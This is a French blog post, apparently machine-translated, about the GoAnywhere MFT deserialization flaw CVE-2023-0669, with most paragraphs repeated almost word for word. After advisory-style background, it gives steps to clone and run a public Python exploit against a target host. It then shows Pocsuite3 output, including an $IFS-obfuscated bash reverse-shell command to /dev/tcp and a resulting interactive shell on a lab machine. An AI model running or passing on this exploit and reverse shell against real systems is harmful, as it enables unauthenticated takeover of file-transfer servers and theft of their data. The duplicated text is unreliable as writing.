
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Désérialisation Vulnérabilités Python RCE Preuve de concept
CVE-2023-0669 Désérialisation GoAnywhere MFT - Blog de Je Yiuwai
CVE-2023-0669 est une vulnérabilité de désérialisation dans GoAnywhere MFT. En raison de la désérialisation d'un objet contrôlé par un attaquant, il existe une vulnérabilité d'injection de commande pré-authentifiée dans le Servlet de réponse de licence. Un attaquant peut exploiter cette vulnérabilité pour exécuter du code arbitraire sur le système affecté, entraînant une prise de contrôle complète du système. La vulnérabilité affecte les versions antérieures à 7.1.2, à l'exclusion de 7.1.2.
CVE-2023-0669 est une vulnérabilité de désérialisation dans GoAnywhere MFT qui existe dans le Servlet de réponse de licence en raison d'une vulnérabilité d'injection de commande pré-authentifiée qui permet à un attaquant d'exécuter du code arbitraire sur le système affecté en désérialisant un objet contrôlé par l'attaquant. La vulnérabilité affecte les versions antérieures à 7.1.2.
Cette vulnérabilité peut constituer une menace sérieuse pour la sécurité du logiciel de transfert de fichiers d'entreprise GoAnywhere MFT. Les attaquants peuvent l'exploiter pour voler des données sensibles, falsifier des données, compromettre le système, etc. Par conséquent, les utilisateurs doivent prendre des mesures rapidement pour protéger le système.
La vulnérabilité constitue une menace sérieuse pour la sécurité du logiciel de transfert de fichiers d'entreprise GoAnywhere MFT, car les attaquants peuvent l'exploiter pour voler des données sensibles, falsifier des données et compromettre les systèmes. Par conséquent, les utilisateurs doivent prendre des mesures rapidement pour protéger leurs systèmes.
Un avis de sécurité officiel a été publié et des méthodes d'inspection préliminaires ont été fournies. Les utilisateurs peuvent vérifier si leur système est affecté par cette vulnérabilité en recherchant des chaînes spécifiques dans le journal userdata/logs. Si des correctifs ne peuvent pas être appliqués, il est recommandé de prendre d'autres mesures de sécurité pour protéger le système.
L'avis de sécurité officiel a été publié et des méthodes d'inspection préliminaires ont été fournies. Les utilisateurs peuvent vérifier si leurs systèmes sont affectés par la vulnérabilité en recherchant des chaînes spécifiques dans le journal userdata/logs. Si les correctifs ne peuvent pas être appliqués, il est recommandé de prendre d'autres mesures de sécurité pour protéger le système.
En résumé, CVE-2023-0669 est une vulnérabilité de désérialisation nécessitant l'attention des utilisateurs. Les utilisateurs doivent mettre à jour vers la dernière version rapidement et vérifier si leur système est affecté par cette vulnérabilité. De plus, il est recommandé aux utilisateurs de renforcer la gestion de la sécurité des logiciels d'entreprise tels que GoAnywhere MFT et de prendre des mesures de sécurité multicouches pour protéger leurs systèmes.
En résumé, CVE-2023-0669 est une vulnérabilité de désérialisation qui nécessite l'attention des utilisateurs. Les utilisateurs doivent mettre à jour vers la dernière version rapidement et vérifier si leurs systèmes sont affectés par la vulnérabilité. De plus, il est recommandé que les utilisateurs renforcent la gestion de la sécurité des logiciels d'entreprise tels que GoAnywhere MFT et prennent des mesures de sécurité multicouches pour protéger leurs systèmes.
Cet Exploit est un script Python utilisé pour exploiter la vulnérabilité CVE-2023-0669 dans GoAnywhere MFT v6.7.9594 et versions antérieures.
Cet Exploit est un script Python utilisé pour exploiter la vulnérabilité CVE-2023-0669 dans GoAnywhere MFT v6.7.9594 et versions antérieures.
Cette vulnérabilité existe en raison d'un problème de sécurité dans le traitement des requêtes Bundle chiffrées dans GoAnywhere MFT. Un attaquant peut envoyer une requête spécialement conçue pour exécuter du code arbitraire sur le serveur cible.
Cette vulnérabilité existe en raison d'un problème de sécurité dans le traitement des requêtes Bundle chiffrées dans GoAnywhere MFT. Un attaquant peut envoyer une requête spécialement conçue pour exécuter du code arbitraire sur le serveur cible.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <IP cible>
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <IP cible>
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | nom-poc | id-poc | composant | version | statut |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet Désérialisation | CVE-2023-0669 | GoAnywhere MFT | avant 7.1.2, excluant 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
Auteur : Je Yiuwai édité par xiaomi pad 6 pro